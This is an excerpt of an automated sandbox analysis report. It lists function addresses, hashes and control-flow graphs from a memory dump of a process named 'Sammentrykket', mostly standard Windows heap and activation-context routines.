                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 33fb741ea755cf16a0b4a199d0e9d366de9f4494d6cd602e55dc0d50b5a471e4
                • Instruction ID: cc10f9d51680e9e91546c9830bc756c3ddd18beaf8bb05c2a262915faaf4a8c1
                • Opcode Fuzzy Hash: 33fb741ea755cf16a0b4a199d0e9d366de9f4494d6cd602e55dc0d50b5a471e4
                • Instruction Fuzzy Hash: D201D6361086059BC341CFFE8654A51BFECFB6A25871001A9E50AD3B14D232ED86C711
                Function 209E92AB Relevance: .0, Instructions: 44COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
                • Instruction ID: e55596d33dfde9271844e2881c656f44701300612e66d90dcfe3f6a49795b747
                • Opcode Fuzzy Hash: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
                • Instruction Fuzzy Hash: 2111A5B1A106219FDB88CF2DC0C0651BBE8FB88350B0582AAED18CB74AD374E915CF94
                Function 209F51B6 Relevance: .0, Instructions: 44COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: eca44219a8a5bf41f5feb22c3a59438e16698c14a01ce73ebe1ab8baea63e5f9
                • Instruction ID: 039434d047d9cccc4a013b5d24f98b53517d8ef44caf5a9303355c8529e1664f
                • Opcode Fuzzy Hash: eca44219a8a5bf41f5feb22c3a59438e16698c14a01ce73ebe1ab8baea63e5f9
                • Instruction Fuzzy Hash: 03118C78E10259EFCB04DFE8D445A9EB7B4EF18704F14809AB915EB381E734DA02CBA4
                Function 2091C2B0 Relevance: .0, Instructions: 43COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f9429900c64a47a2e9c2ca5d52e6d9bd748c69c7f3c99ecb53a8a2d053acaf1b
                • Instruction ID: 9f3e7ebc9ad8059ae4f1adddf60f3e19953eeb423be4ab58e107c2270817daf0
                • Opcode Fuzzy Hash: f9429900c64a47a2e9c2ca5d52e6d9bd748c69c7f3c99ecb53a8a2d053acaf1b
                • Instruction Fuzzy Hash: 7DF046B334153A9BE33206D94841F1BE6A9DFD5A60F220476B117BB740CA78CC82F6E4
                Function 209F50B7 Relevance: .0, Instructions: 43COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e2ae955e396d44ec965573801caf8f61c4f9232b56adddc1d6aaba6bfdac2a11
                • Instruction ID: 6efc65121224960e03afd5f19599f75f0cbe6171a0c44e048bf868d4a4786de7
                • Opcode Fuzzy Hash: e2ae955e396d44ec965573801caf8f61c4f9232b56adddc1d6aaba6bfdac2a11
                • Instruction Fuzzy Hash: 89110C70A006499FDB04DFA9D445B9DF7F4BB08304F1441AAE515EB381D638D941CB50
                Function 2091C090 Relevance: .0, Instructions: 39COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5945f24ac922c433c9bff86e2cb8d84a42ed0551ca5f9de70dbe3d5124a37423
                • Instruction ID: 6c241c0fcf58412dfe44e9e1accfdab8f3888b74050d97e3c1fa28852867543f
                • Opcode Fuzzy Hash: 5945f24ac922c433c9bff86e2cb8d84a42ed0551ca5f9de70dbe3d5124a37423
                • Instruction Fuzzy Hash: D3F0F0B3744249DBE714C6DA8C45F23B39AE788711F7180AAFA068B291EA729C81D255
                Function 209F32C9 Relevance: .0, Instructions: 38COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6204972ff3b380f720e05b2ecc519c88e41dbe2758d314eba0478bbef22976ee
                • Instruction ID: afee7108ee6e2e58a10c0c6682caa09d461a98b17979d7c0f25203f00c268094
                • Opcode Fuzzy Hash: 6204972ff3b380f720e05b2ecc519c88e41dbe2758d314eba0478bbef22976ee
                • Instruction Fuzzy Hash: F1F04F72900608BFE711DBA4CC42FDAB7FCEB04714F104566BA56D7180EAB4EA40CB90
                Function 209F5149 Relevance: .0, Instructions: 35COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b15566249ea261f7f4142b86957544f0ff3229e9710390427e1e13de134018ef
                • Instruction ID: afd127febba32efe120f8e98b3544e6594a5d997eb6089d5edc86c37c0abb749
                • Opcode Fuzzy Hash: b15566249ea261f7f4142b86957544f0ff3229e9710390427e1e13de134018ef
                • Instruction Fuzzy Hash: F9F04F74A04208AFCB04DFF8D945B9EB7F4EF18304F508459B956EB380E678EA00CB54
                Function 209DF2AE Relevance: .0, Instructions: 30COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: eab11dafd0013fab6bb0f54cd233f8fbdaf8c16f9d573b09bfa41f6d28778718
                • Instruction ID: 2a10cf9c66b0dc18831642d2b5a73d77dca0a5c42efb3f1112d08b2eaa0fc317
                • Opcode Fuzzy Hash: eab11dafd0013fab6bb0f54cd233f8fbdaf8c16f9d573b09bfa41f6d28778718
                • Instruction Fuzzy Hash: E7F08C71A51648ABCB04DBE8C86BF9EB7B8AF08704F504098F612EB380D978D901CB18
                Function 209F505B Relevance: .0, Instructions: 30COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 11d0f9c1e1f4aa8f6b2eb34349d107d1dd0f55ec89e95ba20f8fbf1d1c2706fb
                • Instruction ID: 666bdd76dd211b342654f34ed8eb9757d174268ca1f0becc5ddc00a1f4f384ea
                • Opcode Fuzzy Hash: 11d0f9c1e1f4aa8f6b2eb34349d107d1dd0f55ec89e95ba20f8fbf1d1c2706fb
                • Instruction Fuzzy Hash: 90F08270A00248ABDB04DBF8D556F5EB7B8AF09704F544498B602EB384EA78D9008754
                Function 20957128 Relevance: .0, Instructions: 30COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 54ae5208817f0e7f9b98d9e399f00fe3bfb11818fedb153f83094fb8b1625ef7
                • Instruction ID: eb0f7334706bf8349978cc502fce47535ba17dfa72c1d04a40421dadeaf42df0
                • Opcode Fuzzy Hash: 54ae5208817f0e7f9b98d9e399f00fe3bfb11818fedb153f83094fb8b1625ef7
                • Instruction Fuzzy Hash: 08F082319156589FDB12D7F5C246F02B7DCAB46770F1981A1E41B8BA12D764DE40C690
                Function 209181EB Relevance: .0, Instructions: 21COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 114db9202c54257abf2526529968dd102c67066819c003b1d4cdd2b3c6882db7
                • Instruction ID: 723e798f670b465ce46e3d2a13e45df6efd6b22b50b8fb4cbb585bce476c0427
                • Opcode Fuzzy Hash: 114db9202c54257abf2526529968dd102c67066819c003b1d4cdd2b3c6882db7
                • Instruction Fuzzy Hash: 94E08C32145918EEE7311BE0DC01F42B6B9AF40710F2044AAF087068A08ABDACC2EA48
                Function 2091A093 Relevance: .0, Instructions: 15COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: cd39b431740b0d27950a5382705b11406bf46ab810de4961f59ef8eab177e8e3
                • Instruction ID: d472acdc59d55bf9b6bde9a3643ff5c7ed3ec919875c95db5988b66360e25e8b
                • Opcode Fuzzy Hash: cd39b431740b0d27950a5382705b11406bf46ab810de4961f59ef8eab177e8e3
                • Instruction Fuzzy Hash: 77D0123630607497CB2957D56954F67FA199B86A50F16006D790B93900C5188C82D6F0
                Function 209301C0 Relevance: .0, Instructions: 12COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9a34f73ca023a4a6a785f5d272c303ec3737921b4ae57e2e5ea1d679eb78ef85
                • Instruction ID: 99b6baec0b4b0ce8071e19a827d1cf967cb1d2d06f61f0475ef6624c80766fed
                • Opcode Fuzzy Hash: 9a34f73ca023a4a6a785f5d272c303ec3737921b4ae57e2e5ea1d679eb78ef85
                • Instruction Fuzzy Hash: 9AD0E935352D80DFD65ACB5DC9A4B1573A8BB45B84F8144D0E902CB762D66CDE44CA04
                Function 20940230 Relevance: .0, Instructions: 11COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                • Instruction ID: c897075a3d6b8a3b2ec0733abec7da01cc60720e6454720ad8489404784d022d
                • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                • Instruction Fuzzy Hash: 64D0123610024CEFCB05DF80C854E5A772AFFD8710F108019FD1A076508A71ED62DA50
                Function 209FA1F0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285timeCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 143 209fa1f0-209fa269 call 20932330 * 2 RtlDebugPrintTimes 149 209fa41f-209fa444 call 209324d0 * 2 call 20964b50 143->149 150 209fa26f-209fa27a 143->150 152 209fa27c-209fa289 150->152 153 209fa2a4 150->153 155 209fa28f-209fa295 152->155 156 209fa28b-209fa28d 152->156 157 209fa2a8-209fa2b4 153->157 159 209fa29b-209fa2a2 155->159 160 209fa373-209fa375 155->160 156->155 161 209fa2c1-209fa2c3 157->161 159->157 163 209fa39f-209fa3a1 160->163 164 209fa2b6-209fa2bc 161->164 165 209fa2c5-209fa2c7 161->165 169 209fa3a7-209fa3b4 163->169 170 209fa2d5-209fa2fd RtlDebugPrintTimes 163->170 167 209fa2be 164->167 168 209fa2cc-209fa2d0 164->168 165->163 167->161 174 209fa3ec-209fa3ee 168->174 171 209fa3da-209fa3e6 169->171 172 209fa3b6-209fa3c3 169->172 170->149 183 209fa303-209fa320 RtlDebugPrintTimes 170->183 177 209fa3fb-209fa3fd 171->177 175 209fa3cb-209fa3d1 172->175 176 209fa3c5-209fa3c9 172->176 174->163 179 209fa4eb-209fa4ed 175->179 180 209fa3d7 175->180 176->175 181 209fa3ff-209fa401 177->181 182 209fa3f0-209fa3f6 177->182 184 209fa403-209fa409 179->184 180->171 181->184 185 209fa3f8 182->185 186 209fa447-209fa44b 182->186 183->149 191 209fa326-209fa34c RtlDebugPrintTimes 183->191 189 209fa40b-209fa41d RtlDebugPrintTimes 184->189 190 209fa450-209fa474 RtlDebugPrintTimes 184->190 185->177 188 209fa51f-209fa521 186->188 189->149 190->149 195 209fa476-209fa493 RtlDebugPrintTimes 190->195 191->149 196 209fa352-209fa354 191->196 195->149 203 209fa495-209fa4c4 RtlDebugPrintTimes 195->203 197 209fa377-209fa38a 196->197 198 209fa356-209fa363 196->198 202 209fa397-209fa399 197->202 200 209fa36b-209fa371 198->200 201 209fa365-209fa369 198->201 200->160 200->197 201->200 204 209fa38c-209fa392 202->204 205 209fa39b-209fa39d 202->205 203->149 209 209fa4ca-209fa4cc 203->209 206 209fa3e8-209fa3ea 204->206 207 209fa394 204->207 205->163 206->174 207->202 210 209fa4ce-209fa4db 209->210 211 209fa4f2-209fa505 209->211 212 209fa4dd-209fa4e1 210->212 213 209fa4e3-209fa4e9 210->213 214 209fa512-209fa514 211->214 212->213 213->179 213->211 215 209fa507-209fa50d 214->215 216 209fa516 214->216 217 209fa50f 215->217 218 209fa51b-209fa51d 215->218 216->181 217->214 218->188
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID: DebugPrintTimes
                • String ID: HEAP:
                • API String ID: 3446177414-2466845122
                • Opcode ID: 23f5e022e6eab0a22bfe8a13f5278187725a1883dcaff6f4ef339fef5a34abb1
                • Instruction ID: 6584e3727ea369e9ce4c602cc9b2da70189435da39c40b2f4c7134a8b05d2f79
                • Opcode Fuzzy Hash: 23f5e022e6eab0a22bfe8a13f5278187725a1883dcaff6f4ef339fef5a34abb1
                • Instruction Fuzzy Hash: FAA1AAB161831A8FC705CFA8C898A1AB7E5BF88310F14456DEA46DB371E7B4EC41CB91
                Function 2093A170 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 219 2093a170-2093a18f 220 2093a195-2093a1b1 219->220 221 2093a4ad-2093a4b4 219->221 223 2093a1b7-2093a1c0 220->223 224 209877f3-209877f8 220->224 221->220 222 2093a4ba-209877c8 221->222 222->220 229 209877ce-209877d3 222->229 223->224 226 2093a1c6-2093a1cc 223->226 227 2093a1d2-2093a1d4 226->227 228 2093a5da-2093a5dc 226->228 227->224 230 2093a1da-2093a1dd 227->230 228->230 231 2093a5e2 228->231 232 2093a393-2093a399 229->232 230->224 233 2093a1e3-2093a1e6 230->233 231->233 234 2093a1fa-2093a1fd 233->234 235 2093a1e8-2093a1f1 233->235 238 2093a203-2093a24b 234->238 239 2093a5e7-2093a5f0 234->239 236 209877d8-209877e2 235->236 237 2093a1f7 235->237 241 209877e7-209877f0 call 209aef10 236->241 237->234 242 2093a250-2093a255 238->242 239->238 240 2093a5f6-2098780c 239->240 240->241 241->224 245 2093a25b-2093a263 242->245 246 2093a39c-2093a39f 242->246 248 2093a26f-2093a27d 245->248 250 2093a265-2093a269 245->250 247 2093a3a5-2093a3a8 246->247 246->248 251 20987823-20987826 247->251 252 2093a3ae-2093a3be 247->252 248->252 254 2093a283-2093a288 248->254 250->248 253 2093a4bf-2093a4c8 250->253 255 2098782c-20987831 251->255 256 2093a28c-2093a28e 251->256 252->251 257 2093a3c4-2093a3cd 252->257 258 2093a4e0-2093a4e3 253->258 259 2093a4ca-2093a4cc 253->259 254->256 260 20987838 255->260 264 2093a294-2093a2ac call 2093a600 256->264 265 20987833 256->265 257->256 262 2098780e 258->262 263 2093a4e9-2093a4ec 258->263 259->248 261 2093a4d2-2093a4db 259->261 266 2098783a-2098783c 260->266 261->256 267 20987819 262->267 263->267 268 2093a4f2-2093a4f5 263->268 272 2093a3d2-2093a3d9 264->272 273 2093a2b2-2093a2da 264->273 265->260 266->232 270 20987842 266->270 267->251 268->259 274 2093a2dc-2093a2de 272->274 275 2093a3df-2093a3e2 272->275 273->274 274->266 276 2093a2e4-2093a2eb 274->276 275->274 277 2093a3e8-2093a3f3 275->277 278 2093a2f1-2093a2f4 276->278 279 209878ed 276->279 277->242 280 2093a300-2093a30a 278->280 281 209878f1-20987909 call 209aef10 279->281 280->281 282 2093a310-2093a32c call 2093a760 280->282 281->232 287 2093a332-2093a337 282->287 288 2093a4f7-2093a500 282->288 287->232 289 2093a339-2093a35d 287->289 290 2093a502-2093a50b 288->290 291 2093a521-2093a523 288->291 295 2093a360-2093a363 289->295 290->291 292 2093a50d-2093a511 290->292 293 2093a525-2093a543 call 20924428 291->293 294 2093a549-2093a551 291->294 296 2093a5a1-2093a5cb RtlDebugPrintTimes 292->296 297 2093a517-2093a51b 292->297 293->232 293->294 299 2093a369-2093a36c 295->299 300 2093a3f8-2093a3fc 295->300 296->291 318 2093a5d1-2093a5d5 296->318 297->291 297->296 304 2093a372-2093a374 299->304 305 209878e3 299->305 302 2093a402-2093a405 300->302 303 20987847-2098784f 300->303 306 2093a554-2093a56a 302->306 308 2093a40b-2093a40e 302->308 303->306 307 20987855-20987859 303->307 309 2093a440-2093a459 call 2093a600 304->309 310 2093a37a-2093a381 304->310 305->279 312 2093a570-2093a579 306->312 313 2093a414-2093a42c 306->313 307->306 314 2098785f-20987868 307->314 308->299 308->313 326 2093a45f-2093a487 309->326 327 2093a57e-2093a585 309->327 316 2093a387-2093a38c 310->316 317 2093a49b-2093a4a2 310->317 312->304 313->299 322 2093a432-2093a43b 313->322 320 2098786a-2098786d 314->320 321 20987892-20987894 314->321 316->232 324 2093a38e 316->324 317->280 319 2093a4a8 317->319 318->291 319->279 328 2098787b-2098787e 320->328 329 2098786f-20987879 320->329 321->306 325 2098789a-209878a3 321->325 322->304 324->232 325->304 330 2093a489-2093a48b 326->330 327->330 331 2093a58b-2093a58e 327->331 333 2098788b 328->333 334 20987880-20987889 328->334 332 2098788e 329->332 330->316 335 2093a491-2093a493 330->335 331->330 336 2093a594-2093a59c 331->336 332->321 333->332 334->325 337 209878a8-209878b1 335->337 338 2093a499 335->338 336->295 337->338 339 209878b7-209878bd 337->339 338->317 339->338 340 209878c3-209878cb 339->340 340->338 341 209878d1-209878dc 340->341 341->340 342 209878de 341->342 342->338
                Strings
                • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 20987807
                • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 209878F3
                • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 209877E2
                • Actx , xrefs: 20987819, 20987880
                • RtlpFindActivationContextSection_CheckParameters, xrefs: 209877DD, 20987802
                • SsHd, xrefs: 2093A304
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                • API String ID: 0-1988757188
                • Opcode ID: 05ce1cbc84595e26968b42de51c52483c1e6fe1403d7f1f71703520870173929
                • Instruction ID: 57bd934b4d672958a0a83559123b70c89620c41db76b7f27646c96ee36bfc56b
                • Opcode Fuzzy Hash: 05ce1cbc84595e26968b42de51c52483c1e6fe1403d7f1f71703520870173929
                • Instruction Fuzzy Hash: F6E1CE316083028FD715CFA4C888B1AB7E9BB84364F100A6DF966CB291D73ADD45CF82
                Function 20929046 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 199timeCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 531 20929046-209290fb call 20977c40 call 20968f40 call 20939870 538 20929111-20929118 531->538 539 209290fd-2092910e 531->539 538->539 540 2092911a-20929121 538->540 540->539 541 20929123-2092913f call 2093a170 540->541 541->539 544 20929141-20929147 541->544 545 2098231f-20982324 544->545 546 2092914d-20929154 544->546 545->539 547 20982329-20982330 546->547 548 2092915a 546->548 549 20929161-209291be call 20945a40 547->549 550 20982336-20982340 547->550 548->549 549->539 553 209291c4-209291da call 209404c0 549->553 550->549 553->539 556 209291e0-20982372 RtlDebugPrintTimes 553->556 556->539 559 20982378-20982381 556->559 560 20982458-20982463 559->560 561 20982387-2098239c call 2093dc40 559->561 563 20982465-20982470 RtlDebugPrintTimes ReleaseActCtx 560->563 564 209824a7-209824ae 560->564 566 2098239e-2098239f call 20933b90 561->566 567 209823a4-209823d2 call 20939870 561->567 563->564 564->539 566->567 571 2098244c-20982453 call 2098247b 567->571 572 209823d4-209823f1 call 2093a170 567->572 571->560 572->571 576 209823f3-209823f9 572->576 577 209823fb-20982400 576->577 578 20982402-2098243f call 209404c0 576->578 579 20982446 577->579 578->571 582 20982441 578->582 579->571 582->579
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID: DebugPrintTimes
                • String ID: $$@$@wku
                • API String ID: 3446177414-1949908181
                • Opcode ID: a9c2e59eda6e7da3efc7cb45b08d3079a0e7b18e978f765b2fc26e80dc95ec47
                • Instruction ID: 72c430d51ad2773398736729f008398ff5c4499ee9c19ba41e029f6de3548924
                • Opcode Fuzzy Hash: a9c2e59eda6e7da3efc7cb45b08d3079a0e7b18e978f765b2fc26e80dc95ec47
                • Instruction Fuzzy Hash: 15814A71D016699FDB21CF94CC41BDEB7B8AF48710F0041EAAA0AB7250E7349E85CFA1